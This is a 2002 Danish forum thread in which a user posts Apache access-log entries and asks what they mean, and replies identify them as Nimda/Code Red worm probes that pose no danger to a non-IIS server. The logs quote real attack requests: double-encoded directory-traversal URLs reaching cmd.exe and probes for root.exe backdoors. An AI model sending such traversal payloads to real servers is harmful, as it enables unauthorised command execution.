/ Forside / Teknologi / Operativsystemer / Linux / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Linux
#NavnPoint
o.v.n. 11177
peque 7911
dk 4814
e.c 2359
Uranus 1334
emesen 1334
stone47 1307
linuxrules 1214
Octon 1100
10  BjarneD 875
Tydning af apache log
Fra : Duca


Dato : 26-03-02 22:29

Hejsa!

Sakset fra apache access log'en:
80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
80.63.225.203 - - [22/Mar/2002:02:56:48 +0100] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
80.63.184.45 - - [22/Mar/2002:04:00:01 +0100] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 281
80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 281
80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 279
80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
80.63.225.203 - - [22/Mar/2002:04:16:06 +0100] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
----
Dette forsætter i en uedelighed, i error loggen er der tilsvarende fejl om
at cmd.exe og root.exe ikke kan findes (naturligvis, var jeg ved at sige)!?
Hvad betyder alt dette?

Mvh

-Christoffer



 
 
Martin Andersen (26-03-2002)
Kommentar
Fra : Martin Andersen


Dato : 26-03-02 22:40

Duca wrote:

> Hejsa!
>
CUT

Er det ikke forkert gruppe ?

Martin.

Kent Friis (26-03-2002)
Kommentar
Fra : Kent Friis


Dato : 26-03-02 22:41

Den Tue, 26 Mar 2002 22:28:49 +0100 skrev Duca:
>Hejsa!
>
>Sakset fra apache access log'en:
> 80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
> 80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
> 80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
> 80.63.225.203 - - [22/Mar/2002:02:56:48 +0100] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
> 80.63.184.45 - - [22/Mar/2002:04:00:01 +0100] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 281
> 80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 404 281
> 80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 404 279
> 80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
> 80.63.225.203 - - [22/Mar/2002:04:16:06 +0100] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
>----
>Dette forsætter i en uedelighed, i error loggen er der tilsvarende fejl om
>at cmd.exe og root.exe ikke kan findes (naturligvis, var jeg ved at sige)!?
>Hvad betyder alt dette?

At Microsoft's kunder stadig ikke har fået patchet og ryddet op efter
Code Red, Nimda og hvad de ellers hedder.

Ikke noget at bekymre dig om, når du ikke kører IIS.

Mvh
Kent
--
Advarsel: ny e-mail adresse - med risiko for at mails går tabt.
Den gamle adresse virker stadig, men bliver primært checket i
arbejdstiden.

Anders Lund (26-03-2002)
Kommentar
Fra : Anders Lund


Dato : 26-03-02 22:51

"Duca" <ask@news.dk> skrev i en meddelelse
news:3ca0e747$0$87766$edfadb0f@dspool01.news.tele.dk...
> Hejsa!
>
> Sakset fra apache access log'en:
<Snip>
> Hvad betyder alt dette?

Min server bliver også bombet med dem, 10sek på google gav mig følgende:
http://www.securityspace.com/smysecure/w32_nmda_amm.html

--
Mvh
Anders Lund
Programmør på OverClocking.dk



Duca (27-03-2002)
Kommentar
Fra : Duca


Dato : 27-03-02 00:07

Hej igen!

Tusind tak for svarende - så kan jeg også sove godt i nat :)

Mvh

- Christoffer



Søg
Reklame
Statistik
Spørgsmål : 177551
Tips : 31968
Nyheder : 719565
Indlæg : 6408825
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste